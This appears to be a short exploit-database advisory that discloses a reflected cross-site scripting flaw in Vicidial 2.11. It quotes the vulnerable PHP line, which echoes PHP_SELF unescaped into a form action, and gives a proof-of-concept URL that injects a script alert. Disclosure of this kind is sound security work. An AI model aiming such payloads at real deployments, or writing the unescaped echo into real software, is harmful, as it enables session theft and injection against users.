# Exploit Title: Vicidial 2.11 - Reflective XSS
# Date: 0 day
# Exploit Author: David Silveiro
# Exploit Author Github: github.com/davidsilveiro
# Vendor Homepage: http://vicidial.org
# Software Link: https://sourceforge.net/projects/astguiclient/files/astguiclient_2.11rc1.zip/download
# Platorm: PHP



Vicidial is an opensource contact center suite, with outbound and inbound calling as well as many other features.


Vulnerability:



  vdc_email_display.php suffers from a reflective XSS vulnerability from
  unsanitized user input from;

  $_SERVER['PHP_SELF'] on line 387

  And then echoed...

  <form action='<?php echo $_SERVER['PHP_SELF']; ?>' method='get' name="email_display_form" id="email_display_form" onSubmit="if (this.submitted) return false; this.submitted=true" enctype="multipart/form-data">
    


POC:

http://127.0.0.1/vdc_email_display.php/<script>alert('XSS')</script>